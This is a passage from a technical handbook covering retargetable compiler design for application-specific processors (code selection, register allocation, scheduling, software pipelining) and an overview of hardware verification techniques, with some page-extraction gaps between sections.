the same processor target.
The above example illustrates that ASIPs with SIMD support are often pro-
grammed by explicitly specifying vector datatypes in the application source code,
together with overloaded operators and intrinsic functions on those vector datatypes.
This is an elegant programming style that is well accepted, because at the time
when a SIMD ASIP is conceived, designers often have good insight into how the
reference code of their applications can be vectorized. As mentioned in section
“Middle End”, the compiler research community recently revisited the topic of auto-
vectorization. As many ASIPs have SIMD capabilities, auto-vectorization could be
a useful feature in a compiler for ASIPs. Current state-of-the-art techniques can
1174 G. Goossens et al.
vmodule5io(i0,i1,i2,i3,i4,t0,t1,t2,t3,t4,select_tc(c,0),cselect_tc(c,2),select_tc(c,0));
t0 = t0 * pTwid[0*stepn]; o0 = virdx(t0,mrRS);
t1 = t1 * pTwid[1*stepn]; o1 = virdx(t1,mrRS);
t2 = t2 * pTwid[2*stepn]; o2 = virdx(t2,mrRS);
t3 = t3 * pTwid[3*stepn]; o3 = virdx(t3,mrRS);
t4 = t4 * pTwid[4*stepn]; o4 = virdx(t4,mrRS);
pTwid++;
vcmplx_t* restrict p0 = pOut; p0[0*stepn] = o0;
vcmplx_t* restrict p1 = pOut; p1[1*stepn] = o1;
vcmplx_t* restrict p2 = pOut; p2[2*stepn] = o2;
vcmplx_t* restrict p3 = pOut; p3[3*stepn] = o3;
vcmplx_t* restrict p4 = pOut; p4[4*stepn] = o4;
pOut++;
}
}
handle basic use cases, with code consisting of nested loops with data-independent
bounds. For practical use, more research is needed on this topic.
Besides for supporting application-specific datatypes, operators, and intrinsic
functions, C++ has also become popular as an application source code language for
ASIPs because a growing number of C++ software libraries are becoming available
for application domains for which ASIPs are a popular implementation target.
Examples include OpenCV (computer vision), TensorFlow Lite for Microcontrollers
(machine learning), and Eigen and Blaze (vector arithmetic and linear algebra).
Front ends of established compiler frameworks like GCC and especially LLVM
are mostly independent of the processor target, and can therefore be used in
retargetable compilers for ASIPs. Their existing support of C++ is beneficial
in an ASIP context, as explained above. Moreover, leveraging LLVM’s modular
architecture, the LLVM engineering community recently saw increased interest
in research and development of front ends for new domain-specific programming
languages. Examples of such languages include OpenMP (Chandra et al. 2001)
and OpenCL (Kaeli et al. 2012) (parallel programming), Sycl (Reinders et al.
2021) (heterogeneous system programming), Rust (Klabnik and Nichols 2018)
(memory-safe functional programming), and Halide (Ragan-Kelley et al. 2013)
(image processing).
32 Retargetable Compilation 1175
Note though that standard releases of the GCC and LLVM front ends today may
not be applicable to ASIPs without modifications. Since GCC and LLVM were
originally targeting general-purpose CPUs, several of the typical characteristics
of CPUs are reflected in the implementation of these tools, including their front
end. See the introduction of section “Architectural Scope of ASIPs” for a list of
such characteristics. LLVM’s Clang front end has been extended by certain ASIP
tool vendors to alleviate the restrictions originating from the general-purpose CPU
model (Synopsys 2020).
Source-Code Annotations
The implementation of software code on ASIP architectures often must meet
constraints that are imposed by the system in which the ASIP is embedded. One
example is real-time constraints, where the rate at which certain input data are
consumed or output data are produced may not be lower than a specified bound,
or the input-output delay (also called latency) may not exceed a specified bound.
Another example is I/O constraints, i.e., input or output data may have to be stored
in designated memory locations or communicated via designated I/O ports.
information in the instruction scheduling phase in the back end, to apply more
optimal software pipelining (see section “Instruction Scheduling”).
Code Selection
In the code selection phase in the back-end stage, the compiler recognizes patterns of
operations in the application IR that each can be implemented in a single instruction
on the processor target. Such patterns are operation bundles. Typically, these
bundles take the form of directed acyclic graphs (DAGs), with nodes representing
operations and edges indicating data or control dependencies. If the application
IR is a CDFG then the bundles are subgraphs within the CDFG. Compiler
frameworks store the set of patterns that are supported by the target in a data
structure (see LLVM’s TargetLowering class in section “Processor Intermediate
Representation”). In a retargetable compiler that uses a graph-based processor IR,
the valid patterns can be determined by analyzing this processor IR, which is also a
DAG (see, e.g., the ISG representation of Fig. 9).
Code selection consists of two subtasks. The first subtask, called matching,
determines possible matches of DAG patterns from the application IR to the
processor IR. The second subtask, called covering, then selects a set of matched
DAGs from the processor IR that covers the complete application IR.
Once code selection has been completed, the application IR is updated such that
the selected bundles become single objects. For example, if the application IR uses
a DFG representation, the nodes in the DFG now represent bundles, and the edges
represent data dependencies between inputs and outputs of these bundles.
DAG matching and DAG covering are both NP-complete problems. To ensure
low computation time, compilers apply heuristic methods.
Many traditional compilers use heuristics that transform DAGs into trees.
The advantage is that tree matching and tree covering can be solved in linear
time. Both subtasks can now be performed by tree automata for which dynamic
programming techniques are frequently used, certainly in case of general-purpose
CPU architectures (Aho et al. 1989; Fraser et al. 1992). However, as discussed in
section “Specialization”, ASIP architectures typically have a heterogeneous storage
architecture, and instructions can be subject to register-file sub-range and coupling
constraints. For these reasons, code selectors for ASIPs better perform the matching
and covering steps directly on DAG patterns.
As an illustration, Fig. 11 shows a few practical examples of DAG patterns that
can be implemented on specific instructions in ASIPs. The pattern on the left maps
onto an indirect load instruction from a data memory (DM) with a postincrement
of the address pointer (ptr). The address pointer is a common input of the load and
postincrement operations, which makes the pattern a DAG instead of a tree. DAG
matching ensures that the load and postincrement operations are always performed
in the same instruction cycle, as a result of which the pointer must not be stored
for more than one cycle and thus only a single pointer register is required for
consecutive loads. The pattern on the right maps on a full-precision multiply-add-
saturate instruction, as in the expression d = sat(a*b + c). The multiply operation
has two outputs, representing low- and high-order bits. The add operations have two
32 Retargetable Compilation 1177
Fig. 11 Example DAG patterns supported by specific instructions: (a) Indirect load with address
postincrement; (b) Multiply-add-saturate instruction on a saturating MAC functional unit with low
and high parts
outputs, representing data bits and carryout flags. Such operations with multiple
outputs result in DAG patterns.
ASIP Designer uses a code selection technique that directly operates on DAGs,
based on the work presented in (Van Praet 1997). Alternative approaches operating
on DAGs have been proposed in more recent literature, e.g., (Ertl 1999; Ebner et al.
2008).
Register Allocation
Programming languages like C and C++ distinguish between the following types
of variables:
• Global variables: These are defined outside of functions, and always exist.
• Static variables: These are declared with the static keyword, and exist across
function calls.
• Local variables (also called automatic variables): These only exist in the
function in which they are defined.
that have been created in the code selection phase (section “Code Selection”). They
are best kept in registers as much as possible, but due to register capacity limitations
the compiler may decide to temporarily move them to memory. This is referred to
as register spilling. If the processor supports a software stack in memory, spilled
variables will be stored in a dedicated part of the software stack frame called the
spill area.
General-purpose CPUs typically have a single central register file of which all
the register fields are equally accessible as inputs (sources) or outputs (destinations)
of operation bundles. In that case, what remains to be done is to select a register
field in the central register file, for each local variable. This task is referred to as
register assignment. It is discussed separately in section “Register Assignment”.
ASIPs with a heterogeneous storage architecture can have multiple register files
of different sizes that are connected to specific inputs or outputs of functional
units. Register allocation then becomes a more complex task that must consider
aspects like interconnectivity, capacity constraints of each register file, and register-
file access restrictions for individual instructions (e.g., sub-range access or register
coupling: see the discussion on connectivity and storage architecture in section
“Specialization”).
Consider the example ASIP of Fig. 12. The three diagrams show alternative
register allocations for a local variable that is produced on the shifter unit (SH)
and consumed as an input to the multiplier unit (MPY).
• In the left-hand diagram the variable is stored in the single output register of
the shifter, and in a later cycle moved via the result bus to the input port of the
multiplier for immediate consumption. While this solution looks straightforward,
it may be inefficient in case the result bus is heavily loaded by other instructions.
In that case the compiler would have to delay the multiply operation by several
cycles, meanwhile blocking the ALU/shifter unit.
• In the middle diagram the variable is again stored in the output register of the
shifter. In a subsequent cycle it is moved via an operand bus to an input register of
the multiplier. Only in a third cycle it is consumed by the multiplier. Even though
this solution requires an additional move instruction, it may be more efficient, if
the load of the operand bus is lower than of the result bus.
• The right-hand diagram shows a solution that is beneficial if the production of the
variable occurs early, and its consumption occurs late in the program. To avoid
Fig. 12 Three alternative register allocation solutions for the same local variable, in an ASIP with
a heterogeneous storage architecture
32 Retargetable Compilation 1179
that it blocks registers during its long live range, the variable is spilled to the data
memory, where it can reside during many cycles. Just prior to consumption, it is
loaded into an input register of the multiplier and subsequently consumed.
Register Assignment
Register assignment refers to the selection of individual registers fields for local
variables allocated to register files. This is a well-understood problem in compiler
theory. It is assumed that (at least approximative) scheduling of instructions has been
done (see section “Instruction Scheduling”) so that live ranges of local variables are
known.
Variables with overlapping live ranges cannot be assigned to the same register
field. Such constraints can be represented as edges in an undirected graph, called
interference graph, in which the nodes represent the variables. The register assign-
ment problem can then be solved as a graph coloring problem (Chaitin 1982; Briggs
et al. 1994).
Register capacity limitations imply that only a limited number of colors may be
used. When no solution can be found with the given number of colors, heuristic
methods have been described to apply local transformations in the application IR,
resulting in reduced interference. Examples include the introduction of spilling, the
1180 G. Goossens et al.
recomputation of certain variables, and live range splitting (Keith et al. 1998). The
latter refers to making copies of variables that each have a shorter live range and
therefore can be assigned more effectively.
The heterogeneous storage architecture of typical ASIP architectures further
complicates the register assignment task, e.g., to take into account access restrictions
within register files as discussed under connectivity and storage architecture in
section “Specialization”.
Instruction Scheduling
During instruction scheduling, the compiler decides on which control step the
operation bundles will be executed. The optimization objective typically is to obtain
the lowest cycle count for executing the application, but in certain contexts the
smallest code size in program memory may be desired instead.
To deal with phase coupling, some compilers will insert multiple scheduling
phases, e.g., computing an approximative schedule prior to register assignment and
an exact schedule after register assignment.
If the processor supports instruction-word parallelism, which is the case with
most ASIPs, the scheduler is expected to fill the parallel slots with operation
bundles as much as possible. The scheduler must respect all data dependencies (i.e.,
variables can only be consumed after they have been produced) as well as anti-
dependencies (i.e., variables cannot be overwritten before their last consumption).
As an illustration, Fig. 13 lists a fragment of the machine code for the DFT
prime-factor algorithm, generated by ASIP Designer’s retargetable compiler, for
Fig. 13 Fragment of compiler-generated machine code for the DFT prime-factor algorithm, on
the ASIP of section “Example”
32 Retargetable Compilation 1181
the example ASIP introduced in section “Example”. For reference, the five slots of
the ASIP’s parallel instructions are printed at the top. The three-digit numbers at the
far left are program counter (PC) values. In addition to radix calculation operation
bundles, the VU2 slot also encodes control operations. At PC value 407 it contains
a zero-overhead loop operation (shown in red) with two delay slots and PC end
address 429. This means that the loop body ranges from PC values 410 till 429
(shown in red). It can be noted that the compiler was able to fill the parallel slots
well. The DM slot is entirely filled in the loop body, i.e., there are no “no-operation”
(nop) codes, which implies that the loop body has been scheduled optimally.
In sections of code that have been scheduled aggressively, the processor cannot
accept interrupts. This can be easily understood from the right-hand diagram in
Fig. 14: if an interrupt must be serviced between the depicted instruction using slot
1 and the one using slot 0, the anti-dependency can no longer be satisfied. Some
compilers automatically ensure that interrupts are masked during the execution of
such code sections (Goossens 2021).
Aggressive scheduling reduces the register pressure. As such, for a given small
register set, it can produce more compact schedules with a lower cycle count. For
this reason, it is frequently used in ASIPs with instruction-word parallelism.
Table 1 compares the cycle count obtained with standard and aggressive schedul-
ing of FFT algorithms of different sizes on the example ASIP of section “Example”
(with a four-stage instruction pipeline), using ASIP Designer’s compiler (Goossens
2021). The average cycle count gain in these examples is 22%. Higher relative gains
can be obtained on ASIPs with deeper pipelines.
Software Pipelining
Software pipelining is a code transformation step in the scheduling phase that is
supported by many compilers targeting processors with instruction-word paral-
lelism, when the application code contains for-loops (Rau and Glaeser 1981; Lam
1988; Goossens et al. 1989). It applies to both zero-overhead loops and software
loops implemented through conditional branching. The compiler will try to move
operations from one loop iteration to a subsequent one, where they can fill slots that
would otherwise remain unused.
Fig. 15 Compiled machine-code fragments of covariance function with two nested loops, on an
ASIP with no instruction-word parallelism (left) and on an ASIP with four slots of instruction-word
parallelism where the inner loop has been software pipelined (right)
specialization and with four slots of instruction-word parallelism. The compiler has
applied software pipelining to the inner for-loop, resulting in a compact schedule
of only two cycles per loop iteration. The compiler inserted so-called prolog and
epilog code before and after the loop, to ensure correct initialization and termination
of the software pipeline. The compiler may try to schedule prolog and epilog code
in parallel with application code that already preceded or succeeded the loop body.
Software pipelining is often applied to the innermost loop of each loop nest in the
application code. Compilers may also attempt to apply software pipelining at higher
levels of loop nests (Muthukumar and Doshi 2001). This is often beneficial because,
as illustrated by the triangular shapes in Fig. 15 (right), the slot utilization of a
loop’s prolog and epilog is typically quite complementary, so that moving epilog
code to the beginning of the next iteration of the higher-level loop will result in a
higher slot utilization in the higher-level loop body and thus a further cycle count
reduction. This is typically at the expense of larger code size, because the compiler
now must insert extensive prolog and epilog code for the higher-level loop as well.
Alternatively, if the processor supports predicated execution, the instructions in the
loop can be predicated to obtain the required prolog and epilog functionality in the
initial and final iterations.
Scheduling Techniques
Various instruction scheduling algorithms are being applied in compilers. Examples
include:
• List scheduling: While its origins go back a long time (Fisher 1979), list
scheduling continues to be popular in modern compilers. It is a greedy algorithm
that processes control steps from low to high (or the other way round). At every
control step a list of yet unscheduled operation bundles is composed that are
not data dependent on yet-to-be-scheduled bundles. Bundles from the list are
1184 G. Goossens et al.
assigned to the current control step based on a priority function, provided they do
not conflict with other bundles already assigned to this control step. Bundles can
be conflicting for various reasons: they may use the same functional unit(s), write
to the same register port(s), or require incompatible opcode bit settings in the
instruction word. Various priority functions have been proposed, and compilers
may combine them to find more optimal solutions (De Micheli 1994). More
recently, machine learning techniques have been proposed to derive optimized
priority functions for list scheduling (Malik et al. 2008).
• Trace scheduling is an algorithm that was originally developed for VLIW
architectures (Ellis 1986). It places more focus on control-flow aspects of
the application. It repeatedly choses a frequently executed path through the
application’s control-flow graph called a trace, schedules it as compactly as pos-
sible, and then performs extra bookkeeping to glue adjacent traces consistently
together.
• One approach is to use iterative list scheduling (Lam 1988; Goossens et al. 1989).
In each iteration step of the algorithm, a new list schedule is computed for the
loop body. At the end of each step, heuristics are applied to select operation
bundles from the obtained schedule and move them to a different loop iteration,
resulting in a modified loop body that can potentially be scheduled in fewer
cycles. The process repeats until no further reduction of the cycle count for the
loop body can be found.
• Iterative modulo scheduling is another approach to software pipelining (Rau
1994). This algorithm is also iterative, but instead of trying to reduce the cycle
count for the loop body in consecutive iterations, iterative modulo scheduling
starts from a precomputed lower bound on the cycle count (referred to as the
minimum initiation interval) and tries to schedule the loop body within that
bound. This may not be successful. In successive iterations, the bound is then
increased and the core scheduling algorithm is reapplied until a solution is
found. The core scheduling algorithm picks operation bundles based on a priority
function and assigns them to control steps within the allowed initiation interval.
The control step is chosen depending on the already assigned control steps for
other bundles. An important difference with list scheduling is that control step
assignments can be undone during this process.
Extensions to modulo scheduling have been proposed. Swing modulo schedul-
ing is an extension that tries to minimize the live ranges of variables in the loop,
which helps to improve phase coupling with the register assignment phase in the
compiler (Llosa et al. 1996).
32 Retargetable Compilation 1185
Conclusions
The electronics industry of the twenty-first century continues to see strong growth
of smart connected products implemented in heterogeneous multicore SoCs. This
trend is fueled by the development of novel and more application-specific processor
architectures (ASIPs), characterized by increasing amounts of parallelism and
specialization. Such advanced processors require efficient design tools, including
compilers to develop application software.
While software compilation is an engineering discipline with a long history,
today’s context brings new challenges for compiler developers. Compilers must be
able to exploit the features of highly specialized architectures and must become
available quickly, preferably in co-development with the processor architecture
so that early compilation of application code can provide feedback to drive
architectural decisions. Retargetable compilation is an engineering domain that
received renewed attention in view of the above trends and requirements.
This chapter discussed concepts, challenges, and solutions in the domain of
retargetable compilation. While visible as an academic research topic in the 1990s,
continued developments in retargetable compilation meanwhile resulted in several
successful commercial deployments in the context of ASIP design tools. As
described in this chapter, retargetable compilers for ASIPs reuse several concepts
from the more established field of compiler construction. A selection of references
to the compiler construction literature has been provided, which is necessarily
incomplete due to the long history of this field. Retargetable compilers however
also differ from standard compilers in multiple respects. True retargetable compilers
read a processor model expressed in an ADL. Next to a somewhat conventional
application IR, retargetable compilers also use a processor IR that is automatically
constructed from the ADL. The ADL and the processor IR must be able to capture
a wide architectural scope of ASIPs, which can differ significantly from general-
purpose processor architectures. Optimizations in a retargetable compiler directly
operate on both the application IR and the processor IR, and require sophistication
in order to deliver production quality code for each ASIP that can be modeled.
Retargetable compilation is expected to receive continued and renewed interest
from the research community in the next decade. Initiatives like RISC-V are
promoting the diversification and specialization of processor architectures, and thus
of ASIPs. Next-generation smart SoC design projects in industry will see an even
stronger need for more advanced ASIP architectures. In addition to supporting
advanced processor cores, compilers will have to cope with multicore aspects.
Another evolution is the emergence of domain-specific programming languages,
with first industry successes in domains like machine learning and advanced vision
systems. While domain-specific language front ends are emerging, efficient phase
coupling with retargetable compiler back ends will be required to ensure that the
overall resulting tool chain can produce production quality code.
Retargetable compilers may be considered as today’s most successful incarnation
of “hardware/software co-design,” a concept that was coined already at the end of
1186 G. Goossens et al.
Acknowledgments The authors express their appreciation to the reviewers and to their colleague
Sven Wuytack for their constructive feedback on this chapter.
References
Aho AV, Sethi R, Ullman JD (1986) Compilers: principles, techniques and tools. Addison-Wesley,
Reading
Aho AV, Ganapathi M, Tjiang SWK (1989) Code generation using tree matching and dynamic
programming. ACM Trans On Prog Languages and Systems
Aho AV, Lam MS, Sethi R, Ullman JD (2007) Compilers: principles, techniques and tools.
Pearson/Addison-Wesley
Allen R, Kennedy D (1987) Automatic transformations of FORTRAN programs to vector form.
ACM Trans. on Prog. Languages and Systems
Allen R, Kennedy K (2001) Optimizing compilers for modern architectures. Morgan Kaufmann
Arm, Arm compiler for embedded, https://developer.arm.com/tools-and-software/embedded/arm-
compiler
Arm-KEIL, Embedded development tools, https://www.keil.com
Bik AJC, Girkar M, Grey PM, Tian X (2002) Automatic intra-register vectorization for the Intel
architecture. Int. J. of Parallel Programming
Briggs P, Cooper KD, Torczon L (1994) Improvements to graph coloring register allocation. ACM
Trans Prog Lang and Systems
Brockmeyer E (2010) Design of an ASIP for DFT/FFT. Technical Report, Target Compiler
Technologies
Cadence, Tensilica offerings: development toolchain, https://www.cadence.com/en_US/home/
tools/ip/tensilica-ip/technologies.html
Cadence, Tensilica controllers and extensible processors, https://www.cadence.com/en_US/home/
tools/ip/tensilica-ip/tensilica-xtensa-controllers-and-extensible-processors.html
CEVA (2020) CEVA-ToolBox Software Development Suite, https://www.ceva-dsp.com/wp-
content/uploads/2020/11/07_11_20_ToolBox_Product_Note_EN-V2.pdf
Chaitin GJ (1982) Register allocation & spilling via graph coloring. Proc ACM SIGPLAN Symp
on Compiler Construction
Chandra J, Menon R, Dagum L, Kohr D, Maydan D, McDonald J (2001) Parallel programming in
OpenMP. Morgan Kaufmann Publishers
Codasip, Codasip RISC-V Processors, Product documentation, https://codasip.com/products/
codasip-risc-v-processors
Codasip, Codasip Studio, Product documentation, https://codasip.com/products/codasip-studio/
Cytron R, Ferrante J, Rosen BK, Wegman MN, Kenneth Zadeck F (1991) Efficiently computing
static single assignment form and the control dependence graph. Trans Programming Languages
and Systems
De Micheli G (1994) Synthesis and optimization of digital circuits. McGraw-Hill
Dennis JB (2011) Data flow graphs. In: Padua D (ed) Encyclopedia of parallel computing. Springer
Dobbelaere J (2019) RFC: Full ‘restrict’ support in LLVM, https://lists.llvm.org/pipermail/llvm-
dev/2019-March/131127.html
Ebner D, Brandner F, Scholz B, Krall A, Wiedermann P, Kadlec A (2008) Generalized instruction
selection using SSA-graphs. Proc. ACM SIGPLAN/SIGBED Conf. on Lang., Compilers and
Tools for Embedded Systems
Ellis JR (1986) Bulldog: a compiler for VLIW architectures. The MIT Press
32 Retargetable Compilation 1187
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1192
Formal Verification, Simulation, and Emulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1193
Outline of the Section . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1194
Section Organization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1195
Bit-Level Model Checking Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1195
C-to-RTL Equivalence Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1195
Symbolic Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1197
Mechanical Theorem Proving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1197
Versatile Binary-Level Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1198
Information Flow Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1198
Verification of Quantum Circuit Design Flows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1199
Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1199
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1201
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1201
Abstract
S. Ray ()
Intel Corporation, San Jose, CA, USA
e-mail: [email protected]
aspect of computer architecture. The chapters under this section should help
a computer architect understand the challenges and opportunities in verifying
complex system, and in turn, this could influence his or her design decisions.
Keywords
Introduction
houses have integrated such third-party software along with their home-grown
automated verification methodologies in various phases of their design cycles.
Despite such progress, automated verification is far from being a “solved
problem.” The primary reason behind this is the complexity of modern computers.
To meet this challenge, verification algorithms have to be more efficient and
scalable. But it can be argued that clever design of verification algorithms alone
cannot bridge the gap—a better understanding of the design space is needed
so that it can be effectively partitioned into smaller modules, which can be
handled by the automation tools. For this, a deeper synergy between the design
community and the verification community is needed. Both the teams need to
understand the other team’s language, prerequisites, and constraints. Architects and
micro-architects can benefit from rigorous verification by adopting it not only for
demonstrating their designs’ correctness but also as a methodology for designing
modules with verifiable interfaces. This improves composability of modules into
System-on-Chips (SoC), thereby improving verifiablity of the latter. This seems
to be a promising approach for reducing bug escapes while developing complex
computers under time-to-market pressure. It is, therefore, useful for the architecture
community to understand how the available verification techniques work, what
are their limitations, and how they may collaborate with the verification teams to
improve the coverage of verification for their designs.
With a vision of bringing the communities of architects and validators closer,
this section presents a spectrum of verification techniques that have become the
preferred solutions for a practicing verification engineer for different verification
problems. Computer-aided verification has a rich theory whose foundation was
laid by the pioneers such as Alan Turing, Alonzo Church, and Kurt Gödel in
1930s. The subject got a major boost since 1970s with the seminal contribution by
Amir Pnueli, Edmund Clark, Alan Emerson, Josef Sifakis, and their contemporary
researchers. An interested reader may want to consult books such as Clarke et al.
(2018a,b) and BaierKatoen and Katoen (2008) for comprehensive discussions on
the theoretical underpinning of computer aided verification. This section of the
handbook would rather focus on some particular aspects of automated verification
that have been distilled over time into practical and useful techniques that are being
actively deployed by the semiconductor industry in their design cycles.
Computers are composed of hardware and software; the latter includes application
software and system software. While bug escape in any of these components can
lead to failure of the whole system, computer architects are usually concerned
with bugs in hardware and system software. This section would, therefore, focus
on techniques that are practiced to verify hardware, system software, and their
interactions. As hinted at the beginning of this section, verification techniques
are broadly classified into two types: static techniques and dynamic techniques.
Static techniques are performed during the compilation of the design source code
1194 S. Ray
and does not involve running the code using test inputs. Static techniques mostly
apply mathematical reasoning on the structure of the design to infer its logical
correctness. Due to their strong association with formal logic of programming, many
of these techniques are classified under formal verification techniques. Dynamic
techniques, on the other hand, involve running the source code of the design against
a designated set of inputs and the resulting outputs are checked against the expected
behavior. Such techniques are broadly called testing. Computers are subjected to
two types of testing—simulation testing and emulation testing. Computer hardware
is developed in high-level hardware description languages such a Verilog, VHDL, or
SystemVerilog. These languages come with their run-time simulation environment
so that modules developed in these languages can be simulated using test inputs.
This type of dynamic verification of hardware is called simulation testing. This
offers a flexible, low-cost, and quick way of verifying whether a module is behaving
in the right way. Simulation is a great way of finding bugs in a module. However,
if it does not find a bug with the designated set of test vectors, it does not
guarantee that a module is bug free in general. Also, RTL-level simulation becomes
prohibitively slow when applied at the system level. To alleviate the latter problem,
practitioners resort to emulation testing where the RTL-level design is synthesized
onto reconfiguration hardware platforms, and the resulting hardware configuration
is executed against the test inputs. Emulation can achieve significant speedup so that
it can scale for large system-level designs, which are beyond the scope of simulation.
Section Organization
C1 C2
b1 b2 bn
33 Verification and Its Role in Design of Modern Computers 1197
helps gain similar confidence on the latter. Due to the popular choice of high-
level modeling language, this problem is commonly called C-to-RTL equivalence
checking in the industry. Chapter “C-to-RTL Equivalence Checking” discusses
various challenges and opportunities of this important problem and available
solutions to it.
Symbolic Simulation
Model checking and equivalence checking are two major pillars of automated
verification of hardware systems. They are general purpose and fully automated,
require minimal human intervention, and produce counterexamples that expose the
root cause of violations. This has led to their successful adoption in industry—
multiple commercial vendors provide state-of-the-art model checkers and equiva-
lence checkers today and design houses have absorbed them successfully in their
verification flows. While widely successful in their practical applications, their
performance is somewhat limited by the generality of their back-end algorithms.
For example, commercial model checkers support verification of any temporal
property written in System Verilog Assertion (SVA) on any Boolean circuit written
in Verilog, SystemVerilog, or VHDL. While this generality is one of the strengths
of these model checkers, it may result in poor scalability. Specialization often
comes to rescue in such situations. Specialization can be achieved in terms of
both verification algorithm and property specification. Symbolic simulation, which
is the topic of Chap. 36, “Verification of Arithmetic and Datapath Circuits with
Symbolic Simulation”, is one such specialized technique applied to the problem of
verifying arithmetic and data-path circuits. While general-purpose model checkers
can handle a much larger class of properties, symbolic simulation restricts itself to
the verification of invariants within finite time window offset. In return, symbolic
simulation scales on integer and floating-point execution pipelines of real-world
processor designs, which are beyond the reach of general-purpose model checkers.
The biggest advantage of the techniques discussed so far is that they are automatic.
The user is supposed to provide the description of the system (hardware circuit)
and the properties, and the algorithm automatically detects whether the properties
are satisfied by the system. If not, the algorithm also produces a counterexample
showing the root cause of falsification. While highly automated, these techniques
suffer from scalability issues. Mechanical theorem proving sits on the other side of
the spectrum providing less automation but more control on the convergence of the
proof process. In this interactive process, the verification obligation is discharged as
a mathematical formula and proved using standard mathematical technique such as
induction, term rewriting, simplification, and generalization. The proof searching is
done by a computer program called theorem prover. A theorem prover attempts
1198 S. Ray
to derive a proof of the verification obligation (the theorem) using the rules of
the underlying logic. However, it may not be able to derive a proof for a given
theorem, and the human expert needs to intervene and supply some intermediate
lemma(s), which might be easier target(s) for the theorem prover and proof of
which might help the theorem prover to derive the proof of the original theorem.
By manually structuring and decomposing the verification problem, the user can
guide the theorem prover into proofs of very complex systems. Chapter 37,
“Microprocessor Assurance and the Role of Theorem Proving” demonstrates how
theorem prover can be used to verify both architectural and microarchitectural
properties of a microprocessor. As a case study, it demonstrates theorem proving
based verification of x86 architecture.
industry that can be deployed for hardware security analysis at the register transfer
level (RTL) (Hu et al. 2021).
IFT, however, is a fundamentally different problem when compared to traditional
functional verification. While the latter maps to verification of trace properties,
the former belongs to verification of hyperproperties (Clarkson and Schneider
2010). Therefore, traditional static analysis technique such a model checking or
dynamic analysis technique such as simulation will not directly solve the IFT
problem. Generalized algorithms for verifying hyperproperties have been proposed
(Finkbeiner et al. 2015). However, it is shown that IFT problem can be solved
with less expensive algorithms of self-composition and equivalence checking by
mapping IFT to 2-safety problem (Terauchi and Aiken 2005). On the dynamic
side, researchers have shown that simulation based verification can be leveraged
for IFT problems by augmenting the RTL with flow tracker logic (Hu et al. 2021).
Interestingly, the same completeness and scalability trade-offs exist among the
static and dynamic techniques for IFT as well. Chapter 39, “Information Flow
Verification” discusses these techniques, their trade-offs, and the current research
trends in IFT in detail.
The chapters so far collectively describe the techniques that are being used in the
semiconductor industry today for its verification needs. The verification techniques
thus described are conceived and optimized for mainstream synchronous hardware
design flow. While it is not an exaggeration to say that almost entire semiconductor
industry revolves around synchronous hardware design today, quantum computing
is emerging as a promising alternative to classical semiconductor technology. In
tandem with the development of quantum architecture and algorithms, it is impera-
tive to develop verification techniques for quantum hardware as well. Chapter 40,
“Verification of Quantum Circuits” describes various algorithms that are developed
to verify quantum hardware.
Discussion
Quantum Circuits are relatively new research paradigms; they are included in this
section for their immense practical importance. We are poised to see more progress
in those fields in the near future, and we intend to capture them in our subsequent
editions.
Chapter 38, “Versatile Binary-Level Concolic Testing” is the only chapter
in this section that is related to dynamic or run-time verification techniques.
The other chapters deal with static or compile-time verification techniques. Such
static techniques offer exhaustive and principled verification solutions, which are
essential for designing complex systems. It can be argued that architects need to
embrace more formal methods for tackling design complexities as well as workforce
complexities that are unavoidable for big projects. However, poor scalability and
significant learning curve are two major impediments against a wider adoption
of formal methods, and this is where dynamic techniques such as simulation and
emulation come to rescue. Simulation can test designs whose size is beyond the
reach of formal methods and emulation can achieve that at a hardware speed. Any
topic on hardware-level simulation or emulation is not included in this section
though. It is primarily because there are many authoritative references already
available on these topics, which have covered almost all established aspects (Wang
et al. 2006). Nevertheless, certain dynamic techniques have seen recent surge in
interest. Hardware fuzzing is one such area where constraint random simulation
techniques are being revisited for hardware security assurance (Laeufer et al.
2018). We are hoping to cover new results in such contemporary research topics
in subsequent edition of the book.
Computer-aided verification is far from being a solved problem. As designs
are becoming more complex and time-to-market is shrinking, the gap between
what automated verification can deliver and what the semiconductor industry
needs is certainly not closing. This is why researchers are actively looking for
advanced techniques and methodologies for accelerated sign-off, shift-left for
verification deployment, and more verification coverage. While many of these
advanced techniques are still in the realm of academic research, it is worthwhile
to call out some of them as they have the potential to impact the industry in
a positive way. One such area is machine-readable specification with instruction
set modeling. For boosting confidence in the quality of industrial designs, the
architecture community is embracing a change in how they specify the instruction
set architecture (ISA). Traditionally, ISAs have been subjected to limited automated
analysis, if any. However, the practice is changing as researchers are showing
the benefits of capturing ISA in a machine-readable format that can be passed
through a series of formal analyses such as type checking or model checking (Reid
2016; Huang et al. 2018; Armstrong et al. 2019). Beyond machine-readable ISA
specification, architectural modeling has gained significant momentum in the past
decade for verification of memory consistency (Trippel et al. 2017; Zhang et al.
